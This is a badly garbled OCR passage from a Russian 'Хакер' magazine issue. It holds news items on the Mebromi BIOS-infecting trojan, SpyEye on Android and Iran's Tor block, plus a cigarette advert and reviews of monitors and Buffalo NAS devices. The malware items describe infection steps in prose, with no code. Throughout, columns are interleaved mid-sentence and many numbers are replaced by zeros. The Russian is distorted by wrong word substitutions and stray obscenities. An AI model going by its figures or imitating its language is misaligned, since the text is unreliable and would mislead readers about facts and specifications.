аппаратновозможностейматеринскойплаты,обработкааппаратных

перты вирусной лаборатории обнаружили вредонос, получив­

ошибок, регулирование режимами питания, сервисные функции ит.д.

шей назва н ие Tгojan.Mebгomi за классификации Symantec. На

Д ля модификации самого образа ВIОSданная вредонос н ая програм­

стержневой взгляд, сие типовой пофункционалутроян, заражающий

ма используетутилитусЬгоm . ехе !от PhoenixTechnologies], которую, на правах

такжезаложены механизмы, позволяющие заразить

MBR да пытающийся скачатьчто-то изо сети, но, в качестве кого выяснилось, во него BIOS материнской

троянецвнедряетв вид кровный узел hook.гom во качестве

платы компьютера.

Затем Tгojan.Mebгomi отдает своему драйверу команду перепрошить

Первоначально дроппертроянца Т гojan.Bioskit . 0 проверяет, запуще­

равно весь другие файлы, слабит у себя во ресурсах. При помощи этой утилиты

ISA BIOS ROM.

BIOS изо обновленного файла. При следующей перезагрузке компьютера на процессе инициализа­

ны ли ОС процессы нескольких китайских антивирусов: еслитаковые обнаруживаются, тотрой создает прозрачноедиалоговое окно, с кото­

ции

рого осуществляется картель его главной функции . Затем Tгojan.Mebгomi

hook.гom. Вредоносный шифр изо сего модуля и оный и другой однова проверяетзара­

определяетверсию ОС да на случае, когда зто Windows 0000 равным образом превыше !за

женность

исключением WindowsVista], продолжает заражение. Троя н проверяет

тить, что такое? реальность на системеАwагd

богатство командной строки, с которой дьявол можетбытьзапущен из раз­

даннымтроянцем. Так, с трех проверенных на вирусной лаборатории

личными ключами. В ресурсахдроп п фигляр у п аковано ряд файлов:

материнских платзаразитьудалось исключительно одну, а во д вухдругих во памяти

сЬгоm.ехе, hook.гom,

my.sys, flash.dll равным образом Ьios.sys. Е слидрайвер Ьios.sys не удается запустить, иначе говоря BIOS комок п ьютера отличается отАwагd, троянец переходит ко заражению MBR. Но еслидрайверу Ьiоs . sуsудается опознать Awaгd BIOS, ведь начинается самое интересное. Автор Tгojan.Mebгomi немного

BIOS будетвызывать по сию пору имеющиеся PCI Expansion ROM, на томище числе и MBR равным образом перезаражает ее во случае необходимости. Следует отме­ BIOS ни капельки далеко не гарантируетзаражение

BIOS хоботов малограмотный хватило места чтобы склерозник в диковинку го мо хуй . П олучается, что кабы последетектирования равно лечения Tгojan.Mebгomi порядок вновь оказывается инфицированной, ведь источником заражения, скорехонько всего,

выступает инфицированный

BIOS компьютера.

УГРОЗЫДЛЯ МОБИЛЬНЫХУСТРОЙСТВ ВСЕ МНОЖАТСЯ

09°/о ПРИЛОЖЕН ИЙ

НА БАЗЕ iOS И ANDROID НЕ ОБЕСПЕЧИВАЮТ

НЕОБХОДИМЫЙ УРОВЕНЬ

БЕЗОПАСНОСТИ, СЧИТАЮТ ЭКСПЕРТЫ

VIAFORENSICS ХАКЕР

01 /154/ 0011

013


MEGANEWS

INTELИ GOOGLE &УДУТТЕСНО СОТРУДНИЧАТЬ во целях оnтимизации nлатформы Androidдля микропроцессоров lntel.

SPYEYE ДОБРАЛСЯ ДО ANDROID

ИРАНЗАБЛОКИРОВАЛТОR

БАНКОВСКИЙ ТРОЯ Н ЧУВСТВУЕТ СЕБЯ ВОЛЬГОТНО И НА МОБИЛЬНЫХ

TOR В ТОТ ЖЕ ДЕНЬ ВЫПУСТИЛ ОБНОВЛЕНИЕ,

ПЛАТФОРМАХ

ЧТОБЫ ОБОЙТИЭТУБЛОКИРОВКУ

\l!.:Ь- Spy Еуе .... ""--,... .. rJoe---' -""' Pathtatlм f~t.Ь.rcoМrol,_.., [~

....,

• _ __ _ _ _ ..._ - ... ..... 1...... --..n,,,, __ ____ _______, ..,.,..,_uAo•_........ ...... __ ,..,,,_ _ .__,... ~., ,,,

-f_.,.J~_

0.-t..,.,.,.,~_

:.. ... ~аи ... -~· Ь.Ьt

-с.J.

::::;:~~1 ('!~0•.1.

~

·-~·

....... , ,,,_ __--""'_•-aol ..,.,.,_uo/N_._,_........-· 1 . . . . . , , , ,_ _ _ _ _ _ . . . , . .,.,..,-w.............. ~•• •lt- . ,...-aмto.-t..,._p/~1a/-O.~· .' ....... , ,_ __ _ •. ...

....... ,,,,_________ •"*'••• •11- .ou..noooto.-· sа.

щ

,..,. ,_ ~....;-.а..-1•

........... .,_.J....._._,..,. . •--.1._,..,,.__

•no, :/J _... . ,...-a~.ao.-to,,.,.. f-....JНJ~-•HI•at._......... _".,,.,..,~..~~-·

, ._"_,..._._... __• r · - -·••U.C•1 : .. ,,,_ __ _•--t••,.,.,,.__ r._.- • К. • oCI•1

~

r . _ , . -. , oauO•.l '

"loaчo :ll ----

....

•1-н

...-

• .....•

есной текущего лета специалисты F-Secureyжe били

Поданным компании

четвергутром Персия добавил новое положение

тревогу, обнаружив атаку Man-in-the-MoЬile вместе с уча­

Trusteer, малварь на базе Zeus равно SруЕуе­

филырации во принадлежащий прилежащий файрвол с целью того ,

стием модификации SpyEye. Тогда выяснилось , что малварь, созданная получи основе известного банковскоготрояна,

сверху у чилась стрелять SМS-сообщения от устройств,

дабы задерживать пробка волокуша Тог. Благодаря

самый часто используемые бан­ ковскиетрояны. На нихприходится

02%

помощи многочисленны х друзей со общем света, создатели

волокуша быст ро определили порядок блокировки равно выпу не без; тили

работающих nодуправлением SymЬian. Д аль ш е-боль ш е. В

ото 0.6 миллиона слу­

новую версию Тог, не без; через кото р ой его дозволительно обойти. К

этом месяце исследовате ли компании Тгustеегобнаружили

чаев обнаружения равным образом

счастью, пр облема была во ретранс ляторе: сие означает, в чем дело?

удаления вредонос­ ного программнаго

хватит за глаза подновить ретрансля торы равным образом бриджи, да многие де­

ния, однако сейчас держи Android-anпapaтax. Заражение реализовано

обеспечения, кра­

сяткитысячпользователейвИранесно вап олучатвозмож-

пр да митивным образом, почтитакже как бы на cлyчaecSymЬian:

дущего финансовую

н что касается от ть нести протоколы и заботы со Тог, неграмотный буду чи вынужденными совсем

троянецSрitmо, какой-никакой перехватываеттекстовые сообще­

людям , чьи ко мпьютеры ранее были инфицированы

SpyEye,

информацию .

видоизменять программное обе вместе с печение. << Как те х нически работал этот фильтр? Тог пытается изготовить что-то около , с целью еготрафик

предлагалось поставить для радиотелефон фейковое ПО для работы со банковскими онлайн-сервисами . После сего SМS­

выглядел без труда попыткой веб-браузера объединиться от

от ообщения жертв , попавшихся сверху удочку хакеров, начинали

c e pвepoм, так рядом сильнее внимательном рассмотрении дозволительно

https-

пере х ватываться равным образом отходить сверху вместе с айт, находящийся лещадь

было у примечать отдельные люди заслуги . В нашем случае сие были

контролем злоумышленников. Эксперты Trusteeг пишут,

характеристики установленияза знак ованно госоедин е ния

ась? изучили руководящий сервер, гд е хранятся похищенные

Тог ' а, на частности длина срока д ействия сертифи­

данные, равно обнаружили, почто вредоносным пр иложением

ката интересах SSL-ceccии : да мы из тобой изменяли время поведение сертифи­

доколе инфицировано н езна читель же е состав людей . Н касательно

ката сессии каждые двуха часа, во так срок вроде привычный эра

авторы троя для неприкрыто занимаются его развитием, равным образом во будущем

образ действий сертификатов- годик сиречь вяще . Для устране­

тотально могут свести масса неудобета неграмотный токмо бан­

нияблокировкидостаточнобылопростоувеличитьсрок

кам, которые равным образом от пользуютодноразовые ТАN-коды , а равно таким

поведение сертификатов , приближенно чтотеперь наши сертификаты

со айтам , наравне Google равно

имеютболее благовидный период образ действий >>, -говорят

Facebook, которыетакже равным образом не без; поль зу корма

смартфоны для того ра из сылки одноразовы х движение ролей .

создатели козни .

hтс:

BTOPHИK-ДEHbDDOS!

МО&ИЛЬНУЮ ОС ПЛАН И·

05%ПОСТОВСВИДЕО

ПИРАТСКОЕ ПО ВСТРЕ·

ДОЛЖНОСТЬДИРЕКТОРА

РУЕТ ПРИО&РЕСТИ НТС.

НА FACEBOOK- ЭТО

ЧАЕТСЯ В РОССИИ НА

ПОЗАЩИТЕ ПЕРСОНАЛЬ·

Почти

Вероятнее всего, сортировка

LIKEJACKING. То принимать

02% КОМПЬЮТЕРОВ. Для

НЫХДАННЫХ nоявилась

атакэа неделю nрихо­

нажал получи и распишись видео-nоставил

сравнения:в США нынешний а

на

дится то-то и есть закачаешься вторник,

Like! неnонятно чему.

nокаэательравен36%,ав

займет Эр ан Ига н, перед этим

сообщает «Лаборатория

Нигерии 01%.

работавший на комnании

Kacnepcкoro».

комnании nадет на разрабатываемую иНР.

webOS, Palm

Facebook. Этот nост

03% всех ОDоS­

юристом.

011,

ХАКЕР

01 / 054/20 01


SKYPE ОliЭАВЕЛСЯ СВОИМ МАГАЗИНОМ ПРИЛОЖЕНИЙ . Пока на Арр Diгectoгy общепонятно эдак 00 программ .

ГИБКИЙ РИДЕР OTWEXLER

EDIFIER R1200Т­

КОНЦЕПТЫНАКОНЕЦСТАНОВЯТСЯ

ТЕПЕРЬ В ЧЕРНОМ ЦВЕТЕ

РЕАЛЬНОСТЬЮ конце октября шатия-братия Еdifiегперевыпускает хорошо знакомуюпользователямакустическую

систему Edifieг

R1200T на новом обличии. Д анная

пример пока что хорошенького понемножку представлена на черном цвете. Напоминаем, ась? Edi fieг

R1200T -малога баритная, ка­ [140 х 040 х 083 мм), которую

чественно исполненная концепция

ввидускромных размеров безтруда позволительно водворить прямо на столе неподалёку монитора. Модель является приличный альтер­ нативой пластиковым компьютерным колонкам, особенно еслиприходитсяэкономитьпространство . КорпусR1200Тиз­ готовлен изо МДФ равным образом сообразно крыт декоративной пленкой. Передняя па н елка на свою черед п окрыта синтетическим ма т ериалом,

что имитирует кожу, а лицевая обшивка защищена рам­

кой, нате которую натянута акустическая тка нь. Р егулировка громкости равным образом уровня баса вынесена нате заднюю панель. С техническими характеристиками у R1200T всетоже более чем неплохо. Все динамики системы магнитноэкранирован­

ные. Диаметр СЧ/НЧ-динамика-106 мм, твиттера-72 мм; диапазон воспроизводимых системой частот колеблется от 02 Гц давно

m

00000 Гц.

Выходная мощностьсистемы -2х8 Вт

а различных выставках вотуже изрядно планирование

Начатьвыпуск

RMS, а

можнонаблюдатьпрезентациигибкойэлектрон­

устройств вместе с гибким

скромные га бариты, Edifieг R1200T звучиточень достойно,

утнапиштим бума г и, которая легким движением пакши

давно. Была

сворка чив ается на трубочку. Тем неграмотный менее, ни одного девай са, который дозволительно было бы скатать на трубочку, барахолка сей поры

приближенно неграмотный увидел:). Этуситуацию исправляет команда Wexleг со своей уникальной разработкой-электронной книгой

WEXLER .BOOK Flex ONE, выполненной сверху основе гибкого 0" экрана E-iпk со пластиковой подложкой. Благодаря новой технологииможнонебеспокоитьсязабезопасностьэкрана.

Новинка обладает противоударными свойствами, ее дозволено

экраном обещают электронная сборник

Readius, которую анонсировали вновь

во

001 О году, правда где-то

равным образом далеко не выnустили.

Кроме этого, не запрещается

потребляемая-25 Вт. Но главное- вопреки получи приманка

вчастности,даеточеньнеплохиенизкиечастоты . Словом,

нет дыму без огня вариация

R1200T от дизайном <<под дерево>> во про­

шлом году п олучила награду<<Лучшая покупка>> через журнала <<Железо>> во тесте акустических систем

0.0.

Розничная стоимость

новинкисоставляет2200рублей.

воссоздать равным образом концепт сворачивающеrося

во трубочку ОLЕD­ дисплея с компании

Sony.

гнуть, говорить получай п ол равным образом инда надевать на заднем поступок н е джин­

сов! Основное награда гибк относительно годиспл ея ото ста ндартн ого экра­ нанаосновеэлектронныхчернилзаключаетсявтом,чтопри

его производстае на смену не без; т екля нной подложки используется полимерная. Н овыйдисплей включаеттончайшую стальную пластину не без; нанесенным возьми нее слоем электронных схем, кото­

рую из на ерху прикрывает палетка изо «электронных чернил>>. Не­ смотря нате всё-таки это, девайс выполнен на эргономичном корпусе.

Габариты-124х139х7,5 мм, масса-менее

000 г. WEX LER.BOOK Fl ex ОNЕоснащен встроенной памятью на 0 ГБ , которую дозволительно распространить по 00 ГБ после счетвнешних карточек формата MicгoSD. Ридер п в отношении ддер живаетсамые по­

пулярные форматы электронных книг [ Т Х Т 0PDF/ О ОС/ СНМ / НТМ / НТМL / EPUB / FB 0), изображений [JPG / JPEG / ВМР /G IF 0PNG) равным образом аудио файлов [МРЗ). При интенсивном ч тении полногозарядааккумуляторахватаетнанескольконедель.

П оставки читалки н ачнутся сделано на этом месяце. Рекомендо­

чистилище розничная курс -

0.990 руб.

WINSTON XSTYLE ОТ WINSTON Wiпston представляет долгожданную нoвинкyWinston XStyle: сигареты сильнее компактного формата, отличающиеся

XS равно способствует нейтрализации запаха табачного дыма для окружающих. Winston XStyle LSS: новое обмер

в отдельности утонченным вкусом. Инновационная методика

мягкости вкуса .

LSS' гармонически дополняет мягкосердечие вкуса очерк Wiпston

'LSS- дешевле запаха табачного дыма.

~ МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ

W/


FERRUM

Сергий Плотни заговор

...

С ПРИСТАВКОИ

SUPER Заявляем: монитор необходимо избирать

СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ МОНИТОРОВ

НА БАЗЕ IPS/MVA-MATPИЦ

е веришь? Давай посчитаем . Если

RGB- 04 бит. Именно поэтом у IРS-матрица вы­

учесть, ась? лицо начинает <<об­

дает по существу образцовый чернявый цвет. Также

щаться » со РС круглым счетом на

данная методика позволяет достигать высокие

00-12 лет, в таком случае во

оченьтщательно!Как

дата спирт проводит хуй дисплеем 0-5 часов.

углы обзора, высокую контрастность, цветовой

автомобильчик другими словами новую

Повзрослев, нужно п росиживать кюлот

охват равно цветопередачу ... Но из-за однако сие необходимо

пока что мука ш е - во районе 0-1 О часов во кальпа полет

уплатить архи пневмоналгия ш им временем отклика.

подружку. Хотя бы потому, что пред экраном этого

чудного устройства техноманьяк во среднем

проводитчетверть своей

жизни!

таким образом 00 сплош !учеба, работа, отдых!. Уже бу­

Со временем, ко слову, размер TN да IPS размы­

дучи возьми пенсии, техноманьяк со стажем уделяет

лись. Здесь да без дальних разговоров существуют на правах мониторы держи

компьютеру 0-2 часа во день. В итоге получаем,

базе TFT TN из большими у глами , эдак равно мониторы

ась? безликий юзер после

в базе IPS от быстрым откликом. Стандартов же­

свою общежитие проводит вслед за монитором ориентировочно

море. Но сильнее общей сложности популярны в настоящий

040000 часов, 0834 дней сиречь а 06 лет. Согласно

число H-IPS IHoгizoпtali , E-IPS IEпhaпcedl равным образом P-IPS

информации Росстата, средняя продолжитель­

IPгofessioпall. Первый обеспечивает до этот поры большую

ность жизни граждан нашей страны составляет

контрастность, а как и поддерживаеттехнологию

08.84 годы . В итоге да секс учается, зачем продвину­

Advaпced Тгuе

тый русский проводит вслед экраном монитора

ный пребелый цвет. Второй имеет большую апертуру

03.24% своей жизни ...

дляувеличениясветопроницаемости.Наконе~

Так ась? п овторим поуже побольше уверенно: мони­ тор надо облюбовать тщательно. Особенно

White, дающую побольше реалистич­

P-IPS обеспечивает 0.07 миллиарда цветов при 30-битной глубине цвета.

сие касается людей из творческой натурой равно

• Apple LED Cinema Display • ASUS PA246Q • Dell UltraSharp U2711

профессией. Дизайнерам , а вот и все инженерам,

ЗОЛОТАЯ СЕРЕДИНА

неустанно работающим вместе с графическими редак­

Технология MVA IMulti-domaiп Veгtical

торами равным образом САО-программами, нетрудно необхо­

Aligпmeпtl, разработанная компанией Fujitsu,

партия монитор со внушительный диагональю, полной

является компромиссом среди TN равно IPS. Она

глубиной цвета, идеальной цветопередачей равно

позволяет паркет вдалбливать матрицу вместе с большими

большим домиком обзора . Естественно, мониторы

вертикальными равно горизонтальными углами

нате базе ТN-матриц далеко не могут утолить всех

обзора, глубиной цвета и, по причине те х нологии

потребностей человечества. По зтому идеаль­

ускорения RCT, малым временем отклика. Но на

ным выбором гика - работяги станут устройства

сравнении со IPS замет получи и распишись неволя цветовог касательно

получи базе технологий IPS ISFTI или — или но MVA.

баланса через угла зрения, а вдобавок исчезнове н ие деталей на тенях около п ер п ендикулярном взгляде.

• iiyama Prolite X2472HD-1

МЕДЛЕННЕЕ, ДОРОЖЕ , НО КРАСИВЕЕ

• LG IPS236V

Теперь сообразно порядку. Технология IPS llп-Piaпe

няшнем тестировании совершенно мониторы, не считая

Чуть забегая на п еред, скажем, аюшки? во сегод­

Switchiпgl либо а SFТ ISupeг Fiпe TFТI была

одного, основаны в базе в таком случае й другими словами отличный разно­

• NEC MultiSync EA232WMi

разработана компаниями Hitachi да NEC !от­

видности IРS-матрицы. Поэтому единственная

• ViewSonic VP2365wb

дельно!. Несмотря бери небо и земля названия, схема

МVА-модель- iiyama Pгolite X2472HD-1 -

работы ЖК-матрицы был неизменен!. Второй а

заранее участвует

сверх конкурса.

фильтр постоянно был расположен перпендикулярно

016

первому, а следовательно, мир посредством него невыгодный

МЕТОДИКАТЕСТИРОВАНИЯ

проходил . Кроме того, токмо сия методика

Со всевозможными технологиями ознакоми­

способна изображать полную глубину цвета

лись- время перекочевывать из рук в руки ко

ХАКЕР

01 /154/2011


С приставкой Supeг

тестированию! Пока диcплeй монитора прогре­

Pixel

валея на протекание получаса, да мы из тобой изучали дизайн,

пытуемых держи неодинаковые профили обновления

должны являться натянуты ровной, упругой струн­

функционал да эргономику девайса . Также уде­

картинки . Правда, для мониторам сверху базе IРS­

каковой . Любое ответвление говорит об нарушении

лили уважение организации разблюдник равно наличию

матриц круто характеризовать малограмотный стоит: все ж таки

цветопередачи . Второй параметр характе­

la

Peгsistence Analyzeг я nроверили ис­

вместе с тремя RGВ-линиями. В идеале всё-таки контур

концептуал качеству) предустановленных настроек

методика подразумевает наличествование большого

ризуется площадью красного треугольника.

дисплеев . Для мониторов сверху базе IРS-матриц

времени отклика.

Чем сильнее регистан этой геометрической

важным дополнением, безусловно, является

фигуры- тем значительнее цветовой охват. Для

Наконец около занавес тестирования,

наличность подставки не без; несколькими степенями

вооружившись профессиональным колори­

сравнения приведен серо-зеленый треугольник,

свободы, а вот и все опции крепления

метром DataColoг SруdегЗ

а то есть штамп

VESA.

Монитор прогрелся. Первым делом быть по­ мощи программы

TFTtest

автор изучили равномер­

Elite,

определялась

sRGB.

Мониторы сверху базе

цветопередача [под нулевым углом, лещадь домиком

IРS-матриц безусловно должны располагать боль­

градусов во горизонтальной плоскости равным образом

шую пространство цветового охвата . Мониторы для

05

00

ность подеветки разом вместе с отклонением яркости

градусов- во вертикальной) равным образом цветовой охват.

базе Р-IРS-матрицы должны огрызаться сызнова равно

за краям экрана . Далее nри помощи утилиты

Первый параметр характеризуется графиком

стандарту

Adobe RGB.

APPLE LED CINEMA DISPLAY. нешний лицо дисплея

Apple

не грех наименовать классическим.

Яблочной компании всего равно остается, аюшки? заnатентовать со­ четание черного цвета передней панели из бело-серебристой

з адней крышкой корпуса монитора. Чтобы никому далеко не вздумалось с чертить идею! Если испытывать со эстетической точки зрения , ведь

равных

Apple LED Cinema Display

безыскусно нет. Собственно говоря, з а сие

да любят продукцию Стива Джобса. Если а постараться отвлечься через философии

Apple,

ведь мож­

а сыскать шеренга недостатков дисплея. Во-первых, коптеть от яркой глян­

цевой поверхностью, так точно до сей времени около аккомпанементтеплых августовских лучей солнца, отнюдь не нимало удобно. Так да руки чешутся е х идно подшутить << желез­ к у» : аристократия мой, зеркальце, скажи ... Во-вторы х , наличность единственного

порта вании

Mini DisplayPoгt накладывает особые ограничения рядом использо­ Apple LED Cinema Display от РС- придется ловить графичный

преобразователь со соответствующим интерфейсом. Наконец, существование лишь трех USВ-розеток ставит героя сии х строк нате одну с последних ступенек в табели относительно рангах почти названием << функционал>>.

есмотря получи ведь что-нибудь диагональ монитора ASUS PA246Q всего 24 дюйма [есть во сегодняшнем тестировании равно экземпляры

вместе с 07-дюймовыми экранами), нераздельно из кронштейном крепле­ ния механизм выглядит беда мощно. Если монитор потребуется разместить сверху столе, в таком случае готовься расчистить по-под него дополнительное

промежуток . Тем отнюдь не менее, катафалк выполнена идеально! В меру

жесткая, возлюбленная никак не позволит ему сместиться ни получай йоту. А близ необходи­ мости твоя милость можешь свернуть щит на любую сторону. Подставка обла­ даетсразучетырьмястепенямисвободы.Поэтомуподстраиватьсяпод монитор никак не придется: скорее, дисплей хорошенького понемножку приспособляться подина тебя.

Что касается функционала, в таком случае

ASUS PA246Q

оснащен всеми

современными видеопортами [за исключением, пожалуй, DisplayPoгt), а равным образом тремя портами ридером сверху

0 типов

Mini USB да универсальным кард­

флешек. Расположено всё-таки <<хозяйство» держи боко­

завывание панели корпуса, что-нибудь адски удобно. Матрица

ASUS PA246Q

соответствует стандарту

P-IPS. Следо­ 1.07 млрд

вательно, что пишущий сии строки сейчас выяснили раньше, обеспечивает цветов около 00-битной глубине цвета.

ХАКЕР

01 / 054/ 0011

017


FERRUM

DELL ULTRASHARP U2711 не ш никак не дисплей

Oel l UltгaShaгp U2711

выгля д ит шибко бла­

горо д да . Он по отношению г ромен да прекрасе н . Здесь пропал т ой смазливо­ сти, которая п рисутствует, наприме р , у д ис п лея

Apple.

Но сие

ни вот столько отнюдь не отталкивает. А неяркий кор п усик равным образом диcплeй позво л яют полно­ стью ско нц ентрироваться н а ра боте. Такой дисплей прямо обязан н аходи т ься держи столе у начальника какого-нибудь конструкто р ско г о бюро или — или но руково д ите л автор какой-нибуд ь т естовой лабора тории. За подсчёт мощной п что до д вместе с т авки

Oe ll Ul tг aS h aг p U2711

обладае тт ремя

степенями свободы, который п озволяет п по отношению д конструировать крупный 07 -д юймо-

вый кинематография около домашние нужды. К сожалению, осмотреть кинематография в 00

~

градусов безвыгодный получится- торшер далеко не позволяет.

Богат равным образом функционал дисплея. На левой сторо н е корпуса экрана рас­

положена паро ч ка USВ- п ортов равным образом универсаль н ый кард-ридер н а

0

запоми н ающих устройс т во . Е сли дисплей буд е т околачиваться в сто л е, то дотя н у т ься поперед них н е состави т занятие а. Более скрыт н по отношению себя ве д ут видеоинтерфейсы равно

OVI, 0 -S ub, HO MI,

OisplayPoгt да уже пара U S'IЗ. П по отношению

су т и, п еред н ами, наверное, самопроизвольно ы й уни во е р похабный дисплей вместе с полным

<<фар ш ем».

IIYAMA PROLITE X2,72HD-1 ере д нами, в духе сказал бы светильник русского кинематог р афа, «свой посредь чужих, чужеродный середи своих>>. Мони т крик

iiyama

Pгo l ite Х2472 НО -1 является представителем равным образом гордым об­

ла д ателем VА-мат р равным образом ц ы. А точнее,

MVA.

Имен н в отношении благодаря тому ты да я решили

далеко не делать переучет зто образование посредь дру г их, зане с лукавого. Но на­ верняка пользователь заинтересуется д а нн ой моделью. Экран усишко т анов л ен во пластиковую оправу. Согласно со временем д ним

веяниям моды, ты да я имеем профессия из гл янцем. Смотрится дивно д о пе р вых касаний пальчиками . Запасись тряпочкой! Устанав л ивае тся фюзеляж получай ко р охотную подставочку. Из-за того что общий во нашел д исплея невыгодный п ревышает ч етырех килограмм, держится кон­ струк ци моя персона д оволь н по части н адежно. Н по части через небольша г а количества сте п е­

ней свобо д ы ! дисплей позволяется вертеть всего лишь вок р уг г оризонтальной оси ! возможностей по части месячные ировке положения эка р ана немно г о. Н аконец, расс т раивает фи н кцио н а л ь н ая составляющая мо н да т ора .

П р авда, ве нд оробещает на ближайшее вр емя выпусти т ь улучшенную мо д зеленая красавица ВХ2472 НО вместе с ул уч ш е нн ой п одс т а во кой. Помимо видеоин­ т е р фейсов

0-Sub, OVI равным образом HOMI ,

возьми ко рп усе

iiyama

Pгol i te Х2472 НО -1

прозопальгия ш е н иче г об неграмотный т.

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ Тиn матрицы : Диагональ, допущение :

Углы обзора до горизонтали/вертикали : К оличество цветов : Контрастность : Время ото для лика :

Габариты :

Apple LED Cinema Display

IPS 27"", 0560х1440 точек 178/178 градусов 16.7 млн 1000:1 12 мс

0/0:

090х650х201 мм Mini DisplayPoгt, 0х

Вес :

00.7 кг

018

USB 0.0

Dell UltгaShaгp U2711

ASUSPA246Q

IPS 24.1"", 0920х1200точек 178/178 градусов 1073.7 млн 1000:1

IPS 27", 0560х1440 точек 178/178 градусов 1073.7 млн 1000:1

0мс 559х381х235 мм 1х D-Sub, 0х DVI, 0х 2.0, кард-ридер 7.3 кг

0 мс 647х428х200 мм

HDMI,

0х DisplayPoгt, 0х

USB

0х D-Sub, 0х DVI, 2.0, кард - ридер 7.7 кг

HDMI,

0х DisplayPoгt, 0х

ХАКЕР

USB

01/154/2011


С приставкой Supeг

NEC MULTISYNC EA232WMI нешне дисплей

выглядит куда

NEC MultiSync EA232WMi

строго. Здесь отнюдь не найдешь особых закругленных форм корnу­ са да отнюдь не nрищуришься ото блика маркого, глянцевого корnуса.

Но зто невыгодный означает, аюшки? дьявол плохо выглядит. Просто данная модель превосходно подойдет на строгого интерьера- того а рабочего кабинета. Очень удобная подлость п озволи т вертеть монитор как душе желать . Неоспоримый крестик ради дизайнера либо инженера. А сбоку равным образом сзади, без участия видеовыходов, кушать за единый вздох

0 портов USB.

Настройками подбор будет подумаешь ворочать близ помощи

своеобраз ного джойстика. Воспользоваться опциями

NEC MultiSyпc EA232WMi пришлось по вине того, который таково называемый ЕСО Mode по мнению ста-

~

автор этих строк н же изменял ярус яркости эко рана. Работать из ёбаный цветомузыкой было невозможно. Позтом у нужно пустить в дело технологию во мо-

менты, нет-нет да и неграмотный поль зуешьс мы монитором. С непохожий стороны, почему бы прямо-таки никак не отключить монитор сиречь неграмотный заградить скрыться ПК во спящий режим? С третьей стороны, проблемы экологии, затрагиваемые

NEC,

достойны уваже ния.

VIEWSONIC VP2365WB авершает сегодняшнее испытание дисплей через компании

ViewSoпic. Примечательно, что-нибудь автор сих строк уж знакомились вместе с сим

устройством бадняк назад. К сожалению, панно осталась печальной: вслед в такой мере долговременный пора тариф сверху IРS-матрицы изменилась малограмотный сильно.

Модель лещадь скромным для званием

NEC MultiSync EA2 02WMi . Но

VP2365wb

на вид напоминает

никакого копирования тогда нет. Просто

в целях инженеров, художников, дизайнеров да архитекторов подобная конструкция, в выше- взгляд, является оптимальной. Вот да дисплей от <<птичьеЙ>> компании обладает подставкой из четырьмя степенями

свободы . А ибо расположить/повернуть защита нате рабочем столе не составит труда.

К сожалению, в целях нас является загадкой, с чего инженеры

ViewSonic отнюдь не разместили имеющиеся портки USB возьми махало панели. Все 0 слота расположены сзади: вроде следствие, для ним безграмотный очень удоб н что касается обращаться. Там а находятся видеоинтерфейсы: 0-Sub и DVI- набор, признаемся, спар танский. Для уде ржания всех прово­ до на на одном nучке получай ножке подставки nредусмотрены специальные рамочки.

РАЗДАЕМ МЕДАЛЬКИ Лучшие nоказатели продемонстрировал

NEC MultiSync EA232WMi

ViewSonic VP2365wb

UltгaShaгp

U2711 . Даже

около домиком

00

Dell

градусов nре­

тензий для картинке вышел [на фоне остальных участ­

ников! . Вкуnе не без; богатым функцианалом дисnлея да

MVA 24", 0920х1080точек 178/178 градусов 16.7 млн 3000:1 8 мс

IPS 23", 0920х1080 точек 178/178 градусов 16.7 млн 1000:1 14 м вместе с

070х420х179 мм

050х379х220 мм 1х mini 0-Sub, 0х 5х USB 0.0 7.5 кг

0-Sub,

0.6

OVI,

HOMI

кг

IPS 23", 0920х1080 точек 178/178 градусов 16.7 млн 1000:1

0 мс 548х434х250 мм

OVI,

0х OisplayPoгt,

0х 0-Sub, 6.8 кг

OVI,

огромной диагональю во нашей тестовой лаборато­ рии неграмотный следовать кралось ни единого сомнения относительно

nобедителя во номинации <<Выбор редакции>>. Если у тебя убирать

00000

рублей, тебе необходим дисплей возьми

базе IРS-матрицы, ведь сколько у твоя милость пока что безвыгодный на магазине?

Пр с << Л уч шая покуnка>> получил монитор 4х

USB 0.0

PA246Q . Пожалуй,

ASUS

идеальное расшивка ради дизай­

нера да инженера, которому неутомимо необходимо работать дома. :х:

ХАКЕР

01/154/2011

019


FERRUM

Алексейка Шуваев

v

ЛИНЕИКА: BUFFALO Японская пароходство

Buffalo- единственный

изо крупнейших мировых

производителей сетевых накопителей хранения данных. Этой осенью пароходство пришла бери русский рынок, да нам стало интересно приобщиться не без; новым в целях России семейством

сетевых накопителей. Тем паче зачем

Buffalo- шатия

не без; традициями, а устройства, созданные во Японии , всегда елавились своим качеством .

LINKSTATION PRO од определенным ракурсом оный девай со своей формой на­ поминает игровую модильон ото

Buffalo Интерфейс диска:

Microsoft. Правда , устройс тво

известно меньше, а опять же наделено рядышком талантов,

которые слож н в рассуждении переоценить. К примеру, девайсможет экономить

0 х SATA-11

Поддерживаемая емкость:

перед

0, 0, 0 Т б

0 терабайт информации, почто аж соответственно нынешним меркам ужас

Интерфейсы: Etheгnet

заслуженно . Сетевой регистр со гигабитным интерфейсом обе­

00/100/1000 Mbps, 0 х USB 0.0

спечит контентом целое домашни е устройства, добро позволено никак не лишь только

Поддерживаемые nротоколы:

SMB/CIFS, AFP, FTP, НТТР, НТТРS IWebAccess], NTP

иметь расшаренными папками , так равно примазываться к помощи медиаплееров, поддерживающих

Потребляемая мощность:

NAS при DLNA равным образом UPnP. Однодиско­

вая имитация почти что сатана ш умна равным образом nотребляет худо-бедно энергии,

07 Вт 0макс. 04 Вт 45 х 056 х 075 мм

а е ще может отбывать службу получи и распишись раздаче торрентое да корпеть во качестве

Габариты: Вес: 0.1 кг

принт-сервера, коли отсоединить принт ер ко свободному USВ-порту.

LINKSTATION DUO азгоняй тоску равно повышай прочность не без; двухди ско­

вым девайсом, который-нибудь nозволяет увеличить скорость передачи данных тож усилить устойчивость хра нимой

информации следовать контокоррент зеркалирования дисков. Закинув во топку хранилища пару дисков, не возбраняется заразиться раздел емкостью вплоть до

0 Т б - зто го вслед ставни хва тит чтобы хране ния на правах личного медиа­ архива, что-то около да интересах размещения личных файлов равно организации

рабочей инфраструктуры. Если твоя милость ухажер девайсов не без; над­ кусанным яблоком, так оценишь поддержку

Apple TimeMachine

-можно охранять столько снэпшотов, какое количество тебе потреб ует­

ся. При установке приложения

WebAccess нате iPhone равным образом Аndгоid­

